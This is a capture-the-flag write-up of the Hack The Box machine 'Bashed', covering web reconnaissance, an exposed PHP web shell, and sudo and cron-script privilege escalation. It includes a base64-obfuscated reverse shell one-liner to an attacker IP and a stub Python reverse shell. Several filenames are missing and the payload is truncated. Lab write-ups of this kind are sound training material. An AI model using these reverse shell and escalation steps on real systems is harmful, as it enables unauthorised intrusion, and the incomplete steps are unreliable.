
Write up for the HTB machine 'Bashed'

1. Recon

1.1. Nikto

cmd: nikto -host

Our nikto scan reveals to us a number of files and directories

  • /config.php

  • /css/

  • /dev/

  • /php/

  • /images/

  • /icons/

The path /dev/phpbash.php seems to be a remote shell

So let's use this to get a reverse shell by running the following command along with a netcat listener

echo "c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAueC54LzQ0NDQgMD4mMQ==" | base64 -d | bash

Once we have our reverse shell let's start with obtaining a fully interactive shell by running python -c 'import pty;pty.spawn("/bin/bash");' and then sudo -l where we get the following output:

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

This means we don't need a password to move from our user www-data to the user scriptmanager, so we simply run sudo -u scriptmanager /bin/bash

/home/arrexel is where we can find user.txt

2. Privilege escalation

Through further enumeration of the file system we can see that there is a /scripts/ folder in the root of the file system.

Simply running ls -la we can see that is owned by our user, scriptmanager, and test.txt is owned by the root user.

Therefore we could assume that the script is being run by the root user (perhaps through a cronjob, or some sort of other automation), and since is owned by our user, we have permissions to edit it.

So, let's replace with a python script for a reverse shell. We can do this by using echo '{python code here}' > when in the /scripts/ directory.

#!/usr/bin/python3 import socket,subprocess,os; 

Spin up your netcat listener on the same port that is in your script and wait until is run to catch your reverse shell as root.

Finally, navigate to /root/ for root.txt

Last updated